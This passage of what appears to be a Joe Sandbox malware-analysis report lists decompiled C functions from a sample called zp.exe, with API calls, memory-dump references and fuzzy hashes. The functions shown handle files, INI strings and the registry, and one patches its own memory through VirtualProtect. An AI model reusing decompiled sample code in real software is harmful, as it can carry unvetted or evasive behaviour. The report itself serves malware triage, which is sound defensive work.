                                                            				signed int _t5;
                                                            				void* _t6;
                                                            
                                                            				_t5 = GetFileAttributesA(_a4); // executed
                                                            				asm("sbb ecx, ecx");
                                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                            				return _t6;
                                                            			}





                                                            0x00405973
                                                            0x00405980
                                                            0x00405995
                                                            0x0040599b

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 00405973
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                            • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                            • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                            • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040594A(CHAR* _a4) {
                                                            				signed char _t3;
                                                            				signed char _t7;
                                                            
                                                            				_t3 = GetFileAttributesA(_a4); // executed
                                                            				_t7 = _t3;
                                                            				if(_t7 != 0xffffffff) {
                                                            					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                            				}
                                                            				return _t7;
                                                            			}





                                                            0x0040594f
                                                            0x00405955
                                                            0x0040595a
                                                            0x00405963
                                                            0x00405963
                                                            0x0040596c

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,?,00405562,?,?,00000000,00405745,?,?,?,?), ref: 0040594F
                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405963
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                            • Instruction ID: a1f521dedfcb9a291c5df24485c3a4b06dfb9301352aac2cc664dc3a40c3e92f
                                                            • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                            • Instruction Fuzzy Hash: B0D0C972908120EBC2102738AD0889BBB55EB542717058B31F865A22B0C7304C52CAA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402519(intOrPtr __ebx, void* __edi, void* __esi) {
                                                            				intOrPtr _t26;
                                                            				void* _t35;
                                                            				void* _t38;
                                                            
                                                            				 *((intOrPtr*)(_t35 - 0x2c)) = __ebx;
                                                            				_t26 = E004029E0(2);
                                                            				_t38 = _t26 - 1;
                                                            				 *((intOrPtr*)(_t35 - 0x34)) = _t26;
                                                            				if(_t38 < 0) {
                                                            					L24:
                                                            					 *0x423768 =  *0x423768 +  *(_t35 - 4);
                                                            				} else {
                                                            					__ecx = 0x3ff;
                                                            					if(__eax > 0x3ff) {
                                                            						 *((intOrPtr*)(__ebp - 0x34)) = 0x3ff;
                                                            					}
                                                            					if( *__esi == __bl) {
                                                            						L21:
                                                            						__esi =  *((intOrPtr*)(__ebp - 0x2c));
                                                            						goto L22;
                                                            					} else {
                                                            						 *((char*)(__ebp + 0xb)) = __bl;
                                                            						 *(__ebp - 8) = E00405C55(__ecx, __esi);
                                                            						if( *((intOrPtr*)(__ebp - 0x34)) <= __ebx) {
                                                            							goto L21;
                                                            						} else {
                                                            							__esi =  *((intOrPtr*)(__ebp - 0x2c));
                                                            							while(1) {
                                                            								__eax = __ebp - 9;
                                                            								__eax = E004059E7( *(__ebp - 8), __ebp - 9, 1); // executed
                                                            								if(__eax == 0) {
                                                            									break;
                                                            								}
                                                            								if( *((intOrPtr*)(__ebp - 0x18)) != __ebx) {
                                                            									 *(__ebp - 9) & 0x000000ff = E00405C3C(__edi,  *(__ebp - 9) & 0x000000ff);
                                                            								} else {
                                                            									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                                            										__al =  *(__ebp - 9);
                                                            										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                                            											__eax = SetFilePointer( *(__ebp - 8), 0xffffffff, __ebx, 1);
                                                            										} else {
                                                            											 *((char*)(__esi + __edi)) = __al;
                                                            											__esi = __esi + 1;
                                                            										}
                                                            										break;
                                                            									} else {
                                                            										__al =  *(__ebp - 9);
                                                            										 *((char*)(__esi + __edi)) = __al;
                                                            										__esi = __esi + 1;
                                                            										 *((char*)(__ebp + 0xb)) = __al;
                                                            										if(__al == __bl) {
                                                            											break;
                                                            										} else {
                                                            											if(__esi <  *((intOrPtr*)(__ebp - 0x34))) {
                                                            												continue;
                                                            											} else {
                                                            												break;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L25;
                                                            							}
                                                            							L22:
                                                            							 *((char*)(__esi + __edi)) = __bl;
                                                            							if(_t38 == 0) {
                                                            								 *(_t35 - 4) = 1;
                                                            							}
                                                            							goto L24;
                                                            						}
                                                            					}
                                                            				}
                                                            				L25:
                                                            				return 0;
                                                            			}






                                                            0x0040251b
                                                            0x0040251e
                                                            0x00402523
                                                            0x00402526
                                                            0x00402529
                                                            0x00402892
                                                            0x00402895
                                                            0x0040252f
                                                            0x0040252f
                                                            0x00402536
                                                            0x00402538
                                                            0x00402538
                                                            0x0040253d
                                                            0x004025c5
                                                            0x004025c5
                                                            0x00000000
                                                            0x00402543
                                                            0x00402544
                                                            0x0040254f
                                                            0x00402552
                                                            0x00000000
                                                            0x00402554
                                                            0x00402554
                                                            0x00402557
                                                            0x00402557
                                                            0x00402560
                                                            0x00402567
                                                            0x00000000
                                                            0x00000000
                                                            0x0040256c
                                                            0x00402595
                                                            0x0040256e
                                                            0x00402572
                                                            0x0040259f
                                                            0x004025a5
                                                            0x004025bd
                                                            0x004025af
                                                            0x004025af
                                                            0x004025b2
                                                            0x004025b2
                                                            0x00000000
                                                            0x0040257a
                                                            0x0040257a
                                                            0x0040257d
                                                            0x00402580
                                                            0x00402583
                                                            0x00402586
                                                            0x00000000
                                                            0x00402588
                                                            0x0040258b
                                                            0x00000000
                                                            0x0040258d
                                                            0x00000000
                                                            0x0040258d
                                                            0x0040258b
                                                            0x00402586
                                                            0x00402572
                                                            0x00000000
                                                            0x0040256c
                                                            0x004025c8
                                                            0x004025c8
                                                            0x004015a8
                                                            0x00402663
                                                            0x00402663
                                                            0x00000000
                                                            0x004015a8
                                                            0x00402552
                                                            0x0040253d
                                                            0x0040289b
                                                            0x004028a1

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID:
                                                            • API String ID: 2111968516-0
                                                            • Opcode ID: da523f869cfac79a04ffa3e5db67419d0ebecb9d6557fa3ad88d3eb07e21e885
                                                            • Instruction ID: fac254026ff84b5cbf35fb89e6c76f0225adf012b2287d6b840d5e7388a07a0d
                                                            • Opcode Fuzzy Hash: da523f869cfac79a04ffa3e5db67419d0ebecb9d6557fa3ad88d3eb07e21e885
                                                            • Instruction Fuzzy Hash: B7212B70D05299BEDF229FA84E581EEBBB09F05304F64407BE491B63C5D1BC8A81CB2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040223B(int __eax, CHAR* __ebx) {
                                                            				CHAR* _t11;
                                                            				void* _t13;
                                                            				CHAR* _t14;
                                                            				void* _t18;
                                                            				int _t22;
                                                            
                                                            				_t11 = __ebx;
                                                            				_t5 = __eax;
                                                            				_t14 = 0;
                                                            				if(__eax != __ebx) {
                                                            					__eax = E004029FD(__ebx);
                                                            				}
                                                            				if(_t13 != _t11) {
                                                            					_t14 = E004029FD(0x11);
                                                            				}
                                                            				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
                                                            					_t11 = E004029FD(0x22);
                                                            				}
                                                            				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E004029FD(0xffffffcd)); // executed
                                                            				_t22 = _t5;
                                                            				if(_t22 == 0) {
                                                            					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t18 - 4));
                                                            				return 0;
                                                            			}








                                                            0x0040223b
                                                            0x0040223b
                                                            0x0040223d
                                                            0x00402241
                                                            0x00402244
                                                            0x0040224c
                                                            0x00402250
                                                            0x00402259
                                                            0x00402259
                                                            0x0040225e
                                                            0x00402267
                                                            0x00402267
                                                            0x00402274
                                                            0x004015a6
                                                            0x004015a8
                                                            0x00402663
                                                            0x00402663
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                            • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                                            • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                            • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E004025D3(void* __eflags) {
                                                            				long _t6;
                                                            				long _t8;
                                                            				LONG* _t10;
                                                            				void* _t12;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            
                                                            				_push(ds);
                                                            				if(__eflags != 0) {
                                                            					_t6 = E004029E0(2);
                                                            					_t8 = SetFilePointer(E00405C55(_t12, _t15), _t6, _t10,  *(_t17 - 0x18)); // executed
                                                            					if( *((intOrPtr*)(_t17 - 0x20)) >= _t10) {
                                                            						_push(_t8);
                                                            						E00405C3C();
                                                            					}
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t17 - 4));
                                                            				return 0;
                                                            			}









                                                            0x004025d3
                                                            0x004025d4
                                                            0x004025e0
                                                            0x004025ed
                                                            0x004025f6
                                                            0x00402838
                                                            0x0040283a
                                                            0x0040283a
                                                            0x004025f6
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                                                              • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FilePointerwsprintf
                                                            • String ID:
                                                            • API String ID: 327478801-0
                                                            • Opcode ID: 497426c73cd14a6ee936d49042a10d0204a28c140d0682b6984c5b1f1d3fdb88
                                                            • Instruction ID: e8ae1abfc63d14bfc62f8b5fe7a9cb53b203bfeb84c1389027ba8650a40ac2f0
                                                            • Opcode Fuzzy Hash: 497426c73cd14a6ee936d49042a10d0204a28c140d0682b6984c5b1f1d3fdb88
                                                            • Instruction Fuzzy Hash: 0EE04FB6A05224BBEB01BBA55E4A9BF676CDB50309B14C53BF601F00C1D3BC4C419A2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E00402B07(void* __eflags, void* _a4) {
                                                            				char* _t8;
                                                            				intOrPtr _t9;
                                                            				signed int _t11;
                                                            
                                                            				_t8 = E004029FD(0x22);
                                                            				_t9 =  *0x40a7b0; // 0x3d9fd60
                                                            				_t11 = RegOpenKeyExA(E00402AF2( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x423790 | _a4,  &_a4); // executed
                                                            				asm("sbb eax, eax");
                                                            				return  !( ~_t11) & _a4;
                                                            			}






                                                            0x00402b1b
                                                            0x00402b21
                                                            0x00402b2f
                                                            0x00402b37
                                                            0x00402b3f

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                            • Instruction ID: 692d63f4e87c936e9446e8fa18252424463a9f70da0c26dc4546bcf220c6e71a
                                                            • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                            • Instruction Fuzzy Hash: D7E08CB6250108BFDB40EFA4EE4BFA637ECFB14704F00C121BA08E7091CA78E5109B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                            
                                                            				 *0x10004038 = _a4;
                                                            				if(_a8 == 1) {
                                                            					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
                                                            					 *0x1000404c = 0xc2;
                                                            					 *0x1000403c = 0;
                                                            					 *0x10004044 = 0;
                                                            					 *0x10004058 = 0;
                                                            					 *0x10004048 = 0;
                                                            					 *0x10004040 = 0;
                                                            					 *0x10004050 = 0;
                                                            					 *0x1000404e = 0;
                                                            				}
                                                            				return 1;
                                                            			}



                                                            0x1000272d
                                                            0x10002732
                                                            0x10002742
                                                            0x1000274a
                                                            0x10002751
                                                            0x10002756
                                                            0x1000275b
                                                            0x10002760
                                                            0x10002765
                                                            0x1000276a
                                                            0x1000276f
                                                            0x1000276f
                                                            0x10002777

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002742
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                            • Instruction ID: 652332ac7bde672dc05c446cd50b76b12c9e61f3b08479d0be882dc895827dde
                                                            • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                            • Instruction Fuzzy Hash: A3F09BF19092A0DEF360DF688CC47063FE4E3983D6B03852AE358F6269EB3441448B19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040227F(char __ebx) {
                                                            				char _t7;
                                                            				CHAR* _t8;
                                                            				CHAR* _t19;
                                                            				void* _t21;
                                                            				void* _t24;
                                                            
                                                            				_t7 =  *0x409010; // 0xa
                                                            				 *(_t21 + 0xa) = _t7;
                                                            				_t8 = E004029FD(1);
                                                            				 *(_t21 - 0x30) = E004029FD(0x12);
                                                            				GetPrivateProfileStringA(_t8,  *(_t21 - 0x30), _t21 + 0xa, _t19, 0x3ff, E004029FD(0xffffffdd)); // executed
                                                            				_t24 =  *_t19 - 0xa;
                                                            				if(_t24 == 0) {
                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                            					 *_t19 = __ebx;
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t21 - 4));
                                                            				return 0;
                                                            			}








                                                            0x0040227f
                                                            0x00402287
                                                            0x0040228b
                                                            0x0040229b
                                                            0x004022b2
                                                            0x004022b8
                                                            0x00401721
                                                            0x00402637
                                                            0x0040263e
                                                            0x0040263e
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID:
                                                            • API String ID: 1096422788-0
                                                            • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                            • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                                            • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                            • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401595() {
                                                            				int _t5;
                                                            				void* _t11;
                                                            				int _t14;
                                                            
                                                            				_t5 = SetFileAttributesA(E004029FD(0xfffffff0),  *(_t11 - 0x20)); // executed
                                                            				_t14 = _t5;
                                                            				if(_t14 == 0) {
                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t11 - 4));
                                                            				return 0;
                                                            			}






                                                            0x004015a0
                                                            0x004015a6
                                                            0x004015a8
                                                            0x00402663
                                                            0x00402663
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 390d4cfc8f115cbb62a09b4aa5a65753adb2130da79b5638ae475f1e2eb5fe67
                                                            • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                            • Opcode Fuzzy Hash: 390d4cfc8f115cbb62a09b4aa5a65753adb2130da79b5638ae475f1e2eb5fe67
                                                            • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404018(int _a4) {
                                                            				struct HWND__* _t2;
                                                            				long _t3;
                                                            
                                                            				_t2 =  *0x422eb8; // 0x103ca
                                                            				if(_t2 != 0) {
                                                            					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                            					return _t3;
                                                            				}
                                                            				return _t2;
                                                            			}





                                                            0x00404018
                                                            0x0040401f
                                                            0x0040402a
                                                            0x00000000
                                                            0x0040402a
                                                            0x00404030

                                                            APIs
                                                            • SendMessageA.USER32(000103CA,00000000,00000000,00000000), ref: 0040402A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                            • Instruction ID: e3adca175a6f9c0685291c658283386376a3739e196c394007d9a93dd14d7098
                                                            • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                            • Instruction Fuzzy Hash: 23C09B717443007BEA31CB509D49F0777587750741F5544357314F51D4C6B4F410D62D
                                                            Uniqueness

